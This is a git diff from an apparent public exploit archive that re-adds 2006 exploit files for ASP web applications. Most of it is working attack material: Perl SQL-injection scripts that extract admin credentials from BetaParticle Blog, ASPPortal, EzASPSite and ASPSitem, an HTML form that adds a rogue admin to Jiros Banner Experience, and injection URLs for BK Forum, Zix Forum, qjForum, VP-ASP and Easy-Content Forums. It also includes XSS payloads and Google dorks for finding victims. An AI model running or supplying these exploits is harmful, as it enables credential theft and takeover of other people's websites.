+Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit +This exploit has been coded by nukedx +You can found original advisory on http://www.nukedx.com/?viewdoc=19 +Dork for this exploit: inurl:JBSPro +Your target must be like that: www.victim.com/Path/ +The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp +If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/ +For second example your target must be www.victim.com/ +You can login with your admin account via www.victim.com/JBSPath/files/login.asp +Have phun +
+Target -> + + + + + + +
+
+
+
+ + + +Save this code as .htm and then execute. + +# nukedx.com [2006-03-07] + +# milw0rm.com [2006-03-09] diff --git a/platforms/asp/webapps/1589.pl b/platforms/asp/webapps/1589.pl index ea49237b3..81f051bd1 100755 --- a/platforms/asp/webapps/1589.pl +++ b/platforms/asp/webapps/1589.pl @@ -1,67 +1,67 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=20 -#Usage: beta.pl -#googledork: [ "Powered by bp blog" ] 9.710 pages.. -use IO::Socket; -if(@ARGV != 2) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-20\r\n"; - print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to BetaParticle ex: /blog\r\n"; - exit(); -} -sub exploit () { - #Our variables... - $bpserver = $ARGV[0]; - $bpserver =~ s/(http:\/\/)//eg; - $bphost = "http://".$bpserver; - $bpdir = $ARGV[1]; - $bpport = "80"; - $bptar = "template_gallery_detail.asp?fldGalleryID="; - $bpfinal = "main.asp"; - $bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1"; - $bpreq = $bphost.$bpdir.$bptar.$bpxp; - #Sending data... - header(); - print "- Trying to connect: $bpserver\r\n"; - $bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n"; - print $bp "GET $bpreq HTTP/1.1\n"; - print $bp "Accept: */*\n"; - print $bp "Referer: $bphost\n"; - print $bp "Accept-Language: tr\n"; - print $bp "User-Agent: NukeZilla 4.3\n"; - print $bp "Cache-Control: no-cache\n"; - print $bp "Host: $bpserver\n"; - print $bp "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$bp>) { - if ($answer =~ /

(.*?)<\/h3>/) { - print "- Exploit succeed! Getting admin's information\r\n"; - print "- Username: $1\r\n"; - } - if ($answer =~ /

(.*?)<\/p>/) { - print "- Password: $1\r\n"; - print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n"; - exit(); - } - if ($answer =~ /number of columns/) { - print "- This version of BetaParticle is vulnerable too\r\n"; - print "- but default query of SQL-Inj. does not work on it\r\n"; - print "- So please edit query by manually adding null data..\r\n"; - exit(); - } - } - print "- Exploit failed\n" -} - -# milw0rm.com [2006-03-18] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=20 +#Usage: beta.pl +#googledork: [ "Powered by bp blog" ] 9.710 pages.. +use IO::Socket; +if(@ARGV != 2) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-20\r\n"; + print "- BetaParticle Blog <= 6.0 Remote SQL Injection Vulnerability\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to BetaParticle ex: /blog\r\n"; + exit(); +} +sub exploit () { + #Our variables... + $bpserver = $ARGV[0]; + $bpserver =~ s/(http:\/\/)//eg; + $bphost = "http://".$bpserver; + $bpdir = $ARGV[1]; + $bpport = "80"; + $bptar = "template_gallery_detail.asp?fldGalleryID="; + $bpfinal = "main.asp"; + $bpxp = "-1+UNION+SELECT+null,fldAuthorUsername,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1"; + $bpreq = $bphost.$bpdir.$bptar.$bpxp; + #Sending data... 
+ header(); + print "- Trying to connect: $bpserver\r\n"; + $bp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$bpserver", PeerPort => "$bpport") || die "- Connection failed...\n"; + print $bp "GET $bpreq HTTP/1.1\n"; + print $bp "Accept: */*\n"; + print $bp "Referer: $bphost\n"; + print $bp "Accept-Language: tr\n"; + print $bp "User-Agent: NukeZilla 4.3\n"; + print $bp "Cache-Control: no-cache\n"; + print $bp "Host: $bpserver\n"; + print $bp "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$bp>) { + if ($answer =~ /

(.*?)<\/h3>/) { + print "- Exploit succeed! Getting admin's information\r\n"; + print "- Username: $1\r\n"; + } + if ($answer =~ /

(.*?)<\/p>/) { + print "- Password: $1\r\n"; + print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n"; + exit(); + } + if ($answer =~ /number of columns/) { + print "- This version of BetaParticle is vulnerable too\r\n"; + print "- but default query of SQL-Inj. does not work on it\r\n"; + print "- So please edit query by manually adding null data..\r\n"; + exit(); + } + } + print "- Exploit failed\n" +} + +# milw0rm.com [2006-03-18] diff --git a/platforms/asp/webapps/1597.pl b/platforms/asp/webapps/1597.pl index a5b17335a..8b3167d7a 100755 --- a/platforms/asp/webapps/1597.pl +++ b/platforms/asp/webapps/1597.pl 
@@ -1,87 +1,87 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=21 -#Usage: aspp.pl -use IO::Socket; -use Math::BigInt; -if(@ARGV != 3) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-21\r\n"; - print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to ASPPortal ex: /portal/\r\n"; - print "- -> Username that you want password. ex: admin\r\n"; - exit(); -} -sub decrypt () -{ - $lp = length($appass); - $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJnew(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n"; - print $ap "GET $apreq HTTP/1.1\n"; - print $ap "Accept: */*\n"; - print $ap "Referer: $aphost\n"; - print $ap "Accept-Language: tr\n"; - print $ap "User-Agent: NukeZilla\n"; - print $ap "Cache-Control: no-cache\n"; - print $ap "Host: $apserver\n"; - print $ap "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$ap>) { - if ($answer =~ /string: "(.*?)"]'/) { - print "- Exploit succeed! Getting $ARGV[2]'s information\r\n"; - print "- Username: $ARGV[2]\r\n"; - print "- Decrypting password....\r\n"; - $appass = $1; - $appass =~ s/(")/chr(34)/eg; - $appass =~ s/(<)/chr(60)/eg; - $appass =~ s/(>)/chr(62)/eg; - $appass =~ s/( )/chr(32)/eg; - decrypt(); - } - if ($answer =~ /number of columns/) { - print "- This version of ASPPortal is vulnerable too\r\n"; - print "- but default query of SQL-Inj. 
does not work on it\r\n"; - print "- So please edit query by manually adding null data..\r\n"; - exit(); - } - } - #Exploit failed... - print "- Exploit failed\n" -} - -# milw0rm.com [2006-03-20] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=21 +#Usage: aspp.pl +use IO::Socket; +use Math::BigInt; +if(@ARGV != 3) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-21\r\n"; + print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to ASPPortal ex: /portal/\r\n"; + print "- -> Username that you want password. ex: admin\r\n"; + exit(); +} +sub decrypt () +{ + $lp = length($appass); + $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJnew(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n"; + print $ap "GET $apreq HTTP/1.1\n"; + print $ap "Accept: */*\n"; + print $ap "Referer: $aphost\n"; + print $ap "Accept-Language: tr\n"; + print $ap "User-Agent: NukeZilla\n"; + print $ap "Cache-Control: no-cache\n"; + print $ap "Host: $apserver\n"; + print $ap "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$ap>) { + if ($answer =~ /string: "(.*?)"]'/) { + print "- Exploit succeed! 
Getting $ARGV[2]'s information\r\n"; + print "- Username: $ARGV[2]\r\n"; + print "- Decrypting password....\r\n"; + $appass = $1; + $appass =~ s/(")/chr(34)/eg; + $appass =~ s/(<)/chr(60)/eg; + $appass =~ s/(>)/chr(62)/eg; + $appass =~ s/( )/chr(32)/eg; + decrypt(); + } + if ($answer =~ /number of columns/) { + print "- This version of ASPPortal is vulnerable too\r\n"; + print "- but default query of SQL-Inj. does not work on it\r\n"; + print "- So please edit query by manually adding null data..\r\n"; + exit(); + } + } + #Exploit failed... + print "- Exploit failed\n" +} + +# milw0rm.com [2006-03-20] diff --git a/platforms/asp/webapps/1623.pl b/platforms/asp/webapps/1623.pl index 2ba4b4bdb..02def2480 100755 --- a/platforms/asp/webapps/1623.pl +++ b/platforms/asp/webapps/1623.pl 
@@ -1,69 +1,69 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=22 -#Usage: ezasp.pl -#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages.. -use IO::Socket; -if(@ARGV != 2) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-22\r\n"; - print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to EzASPSite ex: /ezasp/\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $ezserver = $ARGV[0]; - $ezserver =~ s/(http:\/\/)//eg; - $ezhost = "http://".$ezserver; - $ezdir = $ARGV[1]; - $ezport = "80"; - $eztar = "Default.asp?Scheme="; - $ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1"; - $ezreq = $ezhost.$ezdir.$eztar.$ezxp; - #Sending data... - header(); - print "- Trying to connect: $ezserver\r\n"; - $ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n"; - print $ez "GET $ezreq HTTP/1.1\n"; - print $ez "Accept: */*\n"; - print $ez "Referer: $ezhost\n"; - print $ez "Accept-Language: tr\n"; - print $ez "User-Agent: NukeZilla\n"; - print $ez "Cache-Control: no-cache\n"; - print $ez "Host: $ezserver\n"; - print $ez "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$ez>) { - if ($answer =~ //) { - print "- SHA1 HASH of PASSWORD: $1\r\n"; - exit(); - } - if ($answer =~ /number of columns/) { - print "- This version of EzASPSite is vulnerable too\r\n"; - print "- but default query of SQL-Inj. 
does not work on it\r\n"; - print "- So please edit query by manually adding null data..\r\n"; - exit(); - } - } - #Exploit failed... - print "- Exploit failed\n" -} - -# nukedx.com [2006-03-29] - -# milw0rm.com [2006-03-29] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=22 +#Usage: ezasp.pl +#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages.. +use IO::Socket; +if(@ARGV != 2) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-22\r\n"; + print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to EzASPSite ex: /ezasp/\r\n"; + exit(); +} +sub exploit () +{ + #Our variables... + $ezserver = $ARGV[0]; + $ezserver =~ s/(http:\/\/)//eg; + $ezhost = "http://".$ezserver; + $ezdir = $ARGV[1]; + $ezport = "80"; + $eztar = "Default.asp?Scheme="; + $ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1"; + $ezreq = $ezhost.$ezdir.$eztar.$ezxp; + #Sending data... 
+ header(); + print "- Trying to connect: $ezserver\r\n"; + $ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n"; + print $ez "GET $ezreq HTTP/1.1\n"; + print $ez "Accept: */*\n"; + print $ez "Referer: $ezhost\n"; + print $ez "Accept-Language: tr\n"; + print $ez "User-Agent: NukeZilla\n"; + print $ez "Cache-Control: no-cache\n"; + print $ez "Host: $ezserver\n"; + print $ez "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$ez>) { + if ($answer =~ //) { + print "- SHA1 HASH of PASSWORD: $1\r\n"; + exit(); + } + if ($answer =~ /number of columns/) { + print "- This version of EzASPSite is vulnerable too\r\n"; + print "- but default query of SQL-Inj. does not work on it\r\n"; + print "- So please edit query by manually adding null data..\r\n"; + exit(); + } + } + #Exploit failed... + print "- Exploit failed\n" +} + +# nukedx.com [2006-03-29] + +# milw0rm.com [2006-03-29] diff --git a/platforms/asp/webapps/1700.pl b/platforms/asp/webapps/1700.pl index 377b7841e..2a6e9b77d 100755 --- a/platforms/asp/webapps/1700.pl +++ b/platforms/asp/webapps/1700.pl 
@@ -1,77 +1,77 @@ -#!/usr/bin/perl -#Method found & Exploit scripted by nukedx -#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com -#Original advisory: http://www.nukedx.com/?viewdoc=23 -#Usage: aspsi.pl -use IO::Socket; -if(@ARGV != 3) { usage(); } -else { exploit(); } -sub header() -{ - print "\n- NukedX Security Advisory Nr.2006-23\r\n"; - print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n"; -} -sub usage() -{ - header(); - print "- Usage: $0 \r\n"; - print "- -> Victim's host ex: www.victim.com\r\n"; - print "- -> Path to ASPSitem ex: /aspsitem/\r\n"; - print "- -> ID of user that you want info ex: 1\r\n"; - exit(); -} -sub exploit () -{ - #Our variables... - $asserver = $ARGV[0]; - $asserver =~ s/(http:\/\/)//eg; - $ashost = "http://".$asserver; - $asdir = $ARGV[1]; - $asport = "80"; - $astar = "Haberler.asp?haber=devam&id="; - $asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2]; - $asreq = $ashost.$asdir.$astar.$asxp; - #Sending data... - header(); - print "- Trying to connect: $asserver\r\n"; - $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n"; - print $as "GET $asreq HTTP/1.1\n"; - print $as "Accept: */*\n"; - print $as "Referer: $ashost\n"; - print $as "Accept-Language: tr\n"; - print $as "User-Agent: NukeZilla\n"; - print $as "Cache-Control: no-cache\n"; - print $as "Host: $asserver\n"; - print $as "Connection: close\n\n"; - print "- Connected...\r\n"; - while ($answer = <$as>) { - if ($answer =~ /class=\"tablo_baslik\">» (.*?)<\/b><\/td>/) { - if ($1 == $ARGV[2]) { - print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n"; - } - else { die "- Exploit failed\n"; } - } - if ($answer =~ /\" align=\"left\">(.*?)(.*?)<\/b>\)/) { - print "- MD5 HASH of PASSWORD: $1\r\n"; - } - if ($answer =~ /\| (.*?) ]
/) { - print "- Regdate: $1\r\n"; - } - if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) { - print "- Email: $1\r\n"; - } - if ($answer =~ / Okunma : (.*?) /) { - print "- MD5 hash of answer: $1\r\n"; - exit(); - } - } - #Exploit failed... - print "- Exploit failed\n" -} - -#nukedx.com [2006-04-19] - -# milw0rm.com [2006-04-19] +#!/usr/bin/perl +#Method found & Exploit scripted by nukedx +#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com +#Original advisory: http://www.nukedx.com/?viewdoc=23 +#Usage: aspsi.pl +use IO::Socket; +if(@ARGV != 3) { usage(); } +else { exploit(); } +sub header() +{ + print "\n- NukedX Security Advisory Nr.2006-23\r\n"; + print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n"; +} +sub usage() +{ + header(); + print "- Usage: $0 \r\n"; + print "- -> Victim's host ex: www.victim.com\r\n"; + print "- -> Path to ASPSitem ex: /aspsitem/\r\n"; + print "- -> ID of user that you want info ex: 1\r\n"; + exit(); +} +sub exploit () +{ + #Our variables... + $asserver = $ARGV[0]; + $asserver =~ s/(http:\/\/)//eg; + $ashost = "http://".$asserver; + $asdir = $ARGV[1]; + $asport = "80"; + $astar = "Haberler.asp?haber=devam&id="; + $asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2]; + $asreq = $ashost.$asdir.$astar.$asxp; + #Sending data... 
+ header(); + print "- Trying to connect: $asserver\r\n"; + $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n"; + print $as "GET $asreq HTTP/1.1\n"; + print $as "Accept: */*\n"; + print $as "Referer: $ashost\n"; + print $as "Accept-Language: tr\n"; + print $as "User-Agent: NukeZilla\n"; + print $as "Cache-Control: no-cache\n"; + print $as "Host: $asserver\n"; + print $as "Connection: close\n\n"; + print "- Connected...\r\n"; + while ($answer = <$as>) { + if ($answer =~ /class=\"tablo_baslik\">» (.*?)<\/b><\/td>/) { + if ($1 == $ARGV[2]) { + print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n"; + } + else { die "- Exploit failed\n"; } + } + if ($answer =~ /\" align=\"left\">(.*?)(.*?)<\/b>\)/) { + print "- MD5 HASH of PASSWORD: $1\r\n"; + } + if ($answer =~ /\| (.*?) ]
/) {
+ print "- Regdate: $1\r\n";
+ }
+ if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
+ print "- Email: $1\r\n";
+ }
+ if ($answer =~ / Okunma : (.*?) /) {
+ print "- MD5 hash of answer: $1\r\n";
+ exit();
+ }
+ }
+ #Exploit failed...
+ print "- Exploit failed\n"
+}
+
+#nukedx.com [2006-04-19]
+
+# milw0rm.com [2006-04-19]
diff --git a/platforms/asp/webapps/1714.txt b/platforms/asp/webapps/1714.txt
index d5f9a1b71..13184e76c 100755
--- a/platforms/asp/webapps/1714.txt
+++ b/platforms/asp/webapps/1714.txt
@@ -1,18 +1,18 @@
-# BK Forum <= 4.0 Remote SQL Injection
-# by n0m3rcy
-# Copyright (c) 2006 n0m3rcy
-# Exploit:
-
-First you must be logged in
-Then type this in your browser
-
-http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
-
-You will find admin's password
-
-# Shoutz:
-nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
-
-# Have phun!
-
-# milw0rm.com [2006-04-24]
+# BK Forum <= 4.0 Remote SQL Injection
+# by n0m3rcy
+# Copyright (c) 2006 n0m3rcy
+# Exploit:
+
+First you must be logged in
+Then type this in your browser
+
+http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
+
+You will find admin's password
+
+# Shoutz:
+nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
+
+# Have phun!
+
+# milw0rm.com [2006-04-24]
diff --git a/platforms/asp/webapps/1759.txt b/platforms/asp/webapps/1759.txt
index 3a88ece7b..5358fed4d 100755
--- a/platforms/asp/webapps/1759.txt
+++ b/platforms/asp/webapps/1759.txt
@@ -1,30 +1,30 @@
-VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
-
-people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
-if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
-well it didn't take me more then 5 minutes to find a bug in vp-asp.
-
-* the vendor was already notified.
-
-p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
-taken by people using the information in this document, if you don't agree please stop reading
-and close this text document asap.
-
-* this information is for educational purposes only!
-
-----
-
-The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
-
-quick hack to add user a/a:
-
-/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
-
-and for those of you that don't know sql at all
-this is how you remove the user 'a':
-
-/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
-
--tracewar
-
-# milw0rm.com [2006-05-06]
+VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
+
+people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
+if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
+well it didn't take me more then 5 minutes to find a bug in vp-asp.
+
+* the vendor was already notified.
+
+p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
+taken by people using the information in this document, if you don't agree please stop reading
+and close this text document asap.
+
+* this information is for educational purposes only!
+
+----
+
+The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
+
+quick hack to add user a/a:
+
+/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
+
+and for those of you that don't know sql at all
+this is how you remove the user 'a':
+
+/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
+
+-tracewar
+
+# milw0rm.com [2006-05-06]
diff --git a/platforms/asp/webapps/1807.txt b/platforms/asp/webapps/1807.txt
index 8941f17b7..30561636d 100755
--- a/platforms/asp/webapps/1807.txt
+++ b/platforms/asp/webapps/1807.txt
@@ -1,21 +1,21 @@
-Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
-
-
-Vulnerability:
---------------------
-SQL_Injection:
-Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
-This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
-Successful exploitation extracts username and password of administrator in clear text .
-
-
-Proof of Concepts:
---------------------
-site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
-site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
-
--------
-
-By FarhadKey On 19 May 2006
-
-# milw0rm.com [2006-05-19]
+Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
+
+
+Vulnerability:
+--------------------
+SQL_Injection:
+Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
+This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
+Successful exploitation extracts username and password of administrator in clear text .
+
+
+Proof of Concepts:
+--------------------
+site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
+site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
+
+-------
+
+By FarhadKey On 19 May 2006
+
+# milw0rm.com [2006-05-19]
diff --git a/platforms/asp/webapps/1833.txt b/platforms/asp/webapps/1833.txt
index 105d3698a..9872ebf6b 100755
--- a/platforms/asp/webapps/1833.txt
+++ b/platforms/asp/webapps/1833.txt
@@ -1,11 +1,11 @@
-# Title : qjForum(member.asp) SQL Injection Vulnerability
-# Author : ajann
-# greetz : Nukedx,TheHacker
-# Dork : "qjForum"
-# Exploit:
-
-# Login before injection.
-
-### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
-
-# milw0rm.com [2006-05-26]
+# Title : qjForum(member.asp) SQL Injection Vulnerability
+# Author : ajann
+# greetz : Nukedx,TheHacker
+# Dork : "qjForum"
+# Exploit:
+
+# Login before injection.
+
+### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
+
+# milw0rm.com [2006-05-26]
diff --git a/platforms/asp/webapps/1834.asp b/platforms/asp/webapps/1834.asp
index 38def82d0..c22f6a5d6 100755
--- a/platforms/asp/webapps/1834.asp
+++ b/platforms/asp/webapps/1834.asp
@@ -1,49 +1,49 @@
-ENGLISH
-# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
-# Dork : "Copyright 2004 easy-content forums"
-# Author : ajann
-# Exploit;
-
-SQL INJECT.ON--------------------------------------------------------
-### http://[target]/[path]/userview.asp?startletter=SQL TEXT
-### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
-
-Example:
-http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
-
-XSS--------------------------------------------------------
-### http://[target]/[path]/userview.asp?startletter=xss TEXT
-### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
-
-Example:
-http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X
-
-
-
-
-TURKISH
-# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
-# Sözcük[Arama] : "powered by phpmydirectory"
-# Aç... Bulan : ajann
-# Aç.k bulunan dosyalar;
-
-SQL INJECT.ON--------------------------------------------------------
-### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
-### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
-
-Örnek:
-http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
-
-XSS--------------------------------------------------------
-
-### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
-### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
-
-Örnek:
-http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
-
-Ac.klama:
-userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
-userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
-
-# milw0rm.com [2006-05-26]
+ENGLISH
+# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
+# Dork : "Copyright 2004 easy-content forums"
+# Author : ajann
+# Exploit;
+
+SQL INJECT.ON--------------------------------------------------------
+### http://[target]/[path]/userview.asp?startletter=SQL TEXT
